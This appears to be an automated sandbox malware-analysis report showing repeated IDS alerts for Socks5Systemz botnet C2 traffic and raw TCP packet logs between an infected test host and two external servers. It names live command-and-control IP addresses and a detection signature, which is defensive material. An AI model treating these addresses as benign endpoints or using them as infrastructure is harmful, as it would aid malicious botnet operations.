2024-09-27T17:32:22.019903+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57547	185.208.158.248	80	TCP
2024-09-27T17:32:22.948397+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57548	185.208.158.248	80	TCP
2024-09-27T17:32:23.788572+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57549	185.208.158.248	80	TCP
2024-09-27T17:32:24.221834+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57549	185.208.158.248	80	TCP
2024-09-27T17:32:24.572523+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57549	185.208.158.248	80	TCP
2024-09-27T17:32:25.416569+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57550	185.208.158.248	80	TCP
2024-09-27T17:32:26.238460+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57551	185.208.158.248	80	TCP
2024-09-27T17:32:26.620409+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57551	185.208.158.248	80	TCP
2024-09-27T17:32:27.662406+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57552	185.208.158.248	80	TCP
2024-09-27T17:32:28.011305+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57552	185.208.158.248	80	TCP
2024-09-27T17:32:28.894011+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57553	185.208.158.248	80	TCP
2024-09-27T17:32:29.250014+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57553	185.208.158.248	80	TCP
2024-09-27T17:32:30.081909+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57554	185.208.158.248	80	TCP
2024-09-27T17:32:30.439564+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57554	185.208.158.248	80	TCP
2024-09-27T17:32:31.293799+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57555	185.208.158.248	80	TCP
2024-09-27T17:32:32.209370+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57556	185.208.158.248	80	TCP
2024-09-27T17:32:32.559173+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57556	185.208.158.248	80	TCP
2024-09-27T17:32:33.392448+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57557	185.208.158.248	80	TCP
2024-09-27T17:32:34.215126+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57558	185.208.158.248	80	TCP
2024-09-27T17:32:35.049986+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57559	185.208.158.248	80	TCP
2024-09-27T17:32:35.411257+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57559	185.208.158.248	80	TCP
2024-09-27T17:32:35.763988+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57559	185.208.158.248	80	TCP
2024-09-27T17:32:36.594047+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57560	185.208.158.248	80	TCP
2024-09-27T17:32:37.422418+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57561	185.208.158.248	80	TCP
2024-09-27T17:32:38.261246+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57562	185.208.158.248	80	TCP
2024-09-27T17:32:39.289194+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57563	185.208.158.248	80	TCP
2024-09-27T17:32:40.123339+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57564	185.208.158.248	80	TCP
2024-09-27T17:32:40.924876+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57565	185.208.158.248	80	TCP
2024-09-27T17:32:41.880651+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57566	185.208.158.248	80	TCP
2024-09-27T17:32:42.250934+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57566	185.208.158.248	80	TCP
2024-09-27T17:32:43.068978+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57567	185.208.158.248	80	TCP
2024-09-27T17:32:43.421271+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57567	185.208.158.248	80	TCP
2024-09-27T17:32:47.253485+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57568	185.208.158.248	80	TCP
2024-09-27T17:32:47.601827+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57568	185.208.158.248	80	TCP
2024-09-27T17:32:47.946316+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57568	185.208.158.248	80	TCP
2024-09-27T17:32:48.796979+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57570	185.208.158.248	80	TCP
2024-09-27T17:32:49.614077+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57571	185.208.158.248	80	TCP
2024-09-27T17:32:49.962516+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57571	185.208.158.248	80	TCP
2024-09-27T17:32:50.807144+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57572	185.208.158.248	80	TCP
2024-09-27T17:32:51.669495+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57573	185.208.158.248	80	TCP
2024-09-27T17:32:52.719678+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57574	185.208.158.248	80	TCP
2024-09-27T17:32:53.621360+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57575	185.208.158.248	80	TCP
2024-09-27T17:32:54.453355+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57576	185.208.158.248	80	TCP
2024-09-27T17:32:55.380008+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57577	185.208.158.248	80	TCP
2024-09-27T17:32:56.275356+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57578	185.208.158.248	80	TCP
2024-09-27T17:32:57.202034+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57579	185.208.158.248	80	TCP
2024-09-27T17:32:58.046291+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57580	185.208.158.248	80	TCP
2024-09-27T17:32:58.953477+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57581	185.208.158.248	80	TCP
2024-09-27T17:32:59.949927+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57582	185.208.158.248	80	TCP
2024-09-27T17:33:00.772029+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57583	185.208.158.248	80	TCP
2024-09-27T17:33:01.633142+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57584	185.208.158.248	80	TCP
2024-09-27T17:33:02.493932+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57585	185.208.158.248	80	TCP
2024-09-27T17:33:03.387368+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57586	185.208.158.248	80	TCP
2024-09-27T17:33:04.249909+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	57587	185.208.158.248	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 17:31:52.749265909 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:52.755819082 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:52.755932093 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:52.756558895 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:52.762171030 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:53.456573963 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:53.456688881 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:53.461613894 CEST	57520	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:53.466964006 CEST	2023	57520	89.105.201.183	192.168.2.6
Sep 27, 2024 17:31:53.467058897 CEST	57520	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:53.467088938 CEST	57520	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:53.471983910 CEST	2023	57520	89.105.201.183	192.168.2.6
Sep 27, 2024 17:31:53.472064018 CEST	57520	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:53.476986885 CEST	2023	57520	89.105.201.183	192.168.2.6
Sep 27, 2024 17:31:54.083472013 CEST	2023	57520	89.105.201.183	192.168.2.6
Sep 27, 2024 17:31:54.127579927 CEST	57520	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:56.101192951 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:56.106278896 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:56.349338055 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:56.349469900 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:56.460501909 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:56.465395927 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:56.885082006 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:56.885179996 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:56.886178017 CEST	57521	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:57.185530901 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:57.185777903 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:57.185894012 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:57.185956955 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:57.186456919 CEST	2023	57521	89.105.201.183	192.168.2.6
Sep 27, 2024 17:31:57.186549902 CEST	57521	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:57.186731100 CEST	57521	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:57.186808109 CEST	57521	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:57.191637993 CEST	2023	57521	89.105.201.183	192.168.2.6
Sep 27, 2024 17:31:57.236231089 CEST	2023	57521	89.105.201.183	192.168.2.6
Sep 27, 2024 17:31:57.304318905 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:57.304769993 CEST	57522	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:57.309762001 CEST	80	57519	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:57.309825897 CEST	80	57522	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:57.309910059 CEST	57519	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:57.310010910 CEST	57522	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:57.310273886 CEST	57522	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:57.315100908 CEST	80	57522	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:57.618269920 CEST	2023	57521	89.105.201.183	192.168.2.6
Sep 27, 2024 17:31:57.618609905 CEST	57521	2023	192.168.2.6	89.105.201.183
Sep 27, 2024 17:31:58.025355101 CEST	80	57522	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:58.025466919 CEST	57522	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:58.179517984 CEST	57522	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:58.179939032 CEST	57523	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:58.337076902 CEST	80	57523	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:58.337399006 CEST	57523	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:58.337555885 CEST	80	57522	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:58.337560892 CEST	57523	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:58.337629080 CEST	57522	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:58.342530966 CEST	80	57523	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:59.024277925 CEST	80	57523	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:59.024528027 CEST	57523	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.146496058 CEST	57523	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.146991968 CEST	57524	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.151844025 CEST	80	57523	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:59.151931047 CEST	80	57524	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:59.151940107 CEST	57523	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.152014971 CEST	57524	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.152204990 CEST	57524	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.157270908 CEST	80	57524	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:59.852696896 CEST	80	57524	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:59.852768898 CEST	57524	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.974433899 CEST	57524	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.974725008 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.980901957 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:59.980982065 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.981065035 CEST	80	57524	185.208.158.248	192.168.2.6
Sep 27, 2024 17:31:59.981079102 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.981117964 CEST	57524	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:31:59.985964060 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:00.689898014 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:00.689985037 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:00.802612066 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:00.807612896 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:01.039459944 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:01.039539099 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:01.147798061 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:01.152750015 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:01.393053055 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:01.393119097 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:01.505816936 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:01.510751009 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:01.913379908 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:01.913472891 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:02.021452904 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:02.026401997 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:02.267426014 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:02.267508984 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:02.380629063 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:02.380903959 CEST	57527	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:02.385750055 CEST	80	57527	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:02.385839939 CEST	57527	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:02.385864019 CEST	80	57526	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:02.385915995 CEST	57526	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:02.385979891 CEST	57527	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:02.390798092 CEST	80	57527	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:03.066957951 CEST	80	57527	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:03.067039013 CEST	57527	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:03.177248001 CEST	57527	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:03.182503939 CEST	80	57527	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:03.418124914 CEST	80	57527	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:03.418240070 CEST	57527	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:03.537595987 CEST	57527	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:03.538062096 CEST	57528	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:03.543176889 CEST	80	57528	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:03.543288946 CEST	80	57527	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:03.543297052 CEST	57528	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:03.543361902 CEST	57527	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:03.543560982 CEST	57528	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:03.549691916 CEST	80	57528	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:04.272787094 CEST	80	57528	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:04.272953987 CEST	57528	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:04.480695963 CEST	57528	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:04.480981112 CEST	57529	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:04.486056089 CEST	80	57528	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:04.486166000 CEST	57528	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:04.486613035 CEST	80	57529	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:04.486758947 CEST	57529	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:04.487080097 CEST	57529	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:04.491933107 CEST	80	57529	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:05.215248108 CEST	80	57529	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:05.215372086 CEST	57529	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:05.335589886 CEST	57529	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:05.335915089 CEST	57530	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:05.340792894 CEST	80	57530	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:05.340910912 CEST	57530	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:05.341111898 CEST	57530	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:05.341584921 CEST	80	57529	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:05.341662884 CEST	57529	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:05.345987082 CEST	80	57530	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:06.018549919 CEST	80	57530	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:06.018644094 CEST	57530	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:06.133611917 CEST	57530	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:06.138580084 CEST	80	57530	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:06.373557091 CEST	80	57530	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:06.373693943 CEST	57530	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:06.490268946 CEST	57530	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:06.490597010 CEST	57531	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:06.495573997 CEST	80	57531	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:06.495656967 CEST	80	57530	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:06.495693922 CEST	57531	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:06.495742083 CEST	57530	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:06.495858908 CEST	57531	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:06.500669003 CEST	80	57531	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:07.205893040 CEST	80	57531	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:07.205985069 CEST	57531	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:07.410235882 CEST	57531	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:07.410672903 CEST	57532	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:07.415601969 CEST	80	57531	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:07.415646076 CEST	80	57532	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:07.415685892 CEST	57531	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:07.415766954 CEST	57532	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:07.420233011 CEST	57532	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:07.425136089 CEST	80	57532	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:08.108875036 CEST	80	57532	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:08.108983040 CEST	57532	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:08.226161957 CEST	57532	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:08.226486921 CEST	57533	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:08.231442928 CEST	80	57533	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:08.231554985 CEST	57533	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:08.231585026 CEST	80	57532	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:08.231642008 CEST	57532	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:08.231808901 CEST	57533	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:08.236603975 CEST	80	57533	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:08.923155069 CEST	80	57533	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:08.923276901 CEST	57533	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:09.038568974 CEST	57533	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:09.038949013 CEST	57534	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:09.044063091 CEST	80	57533	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:09.044110060 CEST	80	57534	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:09.044146061 CEST	57533	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:09.044198990 CEST	57534	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:09.044361115 CEST	57534	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:09.049206972 CEST	80	57534	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:09.752852917 CEST	80	57534	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:09.753087044 CEST	57534	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:09.915524006 CEST	57534	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:09.916064978 CEST	57535	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:10.164017916 CEST	80	57535	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:10.164076090 CEST	80	57534	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:10.164252043 CEST	57534	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:10.164305925 CEST	57535	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:10.281172037 CEST	57535	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:10.288551092 CEST	80	57535	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:10.882915020 CEST	80	57535	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:10.885802984 CEST	57535	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.037689924 CEST	57535	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.038079023 CEST	57536	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.043064117 CEST	80	57535	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:11.043200016 CEST	57535	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.043448925 CEST	80	57536	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:11.043656111 CEST	57536	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.043915987 CEST	57536	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.048840046 CEST	80	57536	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:11.795059919 CEST	80	57536	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:11.795330048 CEST	57536	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.924310923 CEST	57536	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.924748898 CEST	57537	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.929939985 CEST	80	57536	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:11.930007935 CEST	57536	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.930315971 CEST	80	57537	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:11.930409908 CEST	57537	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.930565119 CEST	57537	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:11.936325073 CEST	80	57537	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:12.694988966 CEST	80	57537	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:12.695074081 CEST	57537	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:12.802819014 CEST	57537	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:13.011238098 CEST	80	57537	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:13.253220081 CEST	80	57537	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:13.253376961 CEST	57537	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:13.435983896 CEST	57537	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:13.436377048 CEST	57538	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:13.446012974 CEST	80	57538	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:13.446146965 CEST	57538	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:13.446466923 CEST	80	57537	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:13.446535110 CEST	57537	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:13.451730967 CEST	57538	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:13.457007885 CEST	80	57538	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:14.186856985 CEST	80	57538	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:14.187113047 CEST	57538	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:14.303219080 CEST	57538	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:14.303596020 CEST	57539	80	192.168.2.6	185.208.158.248
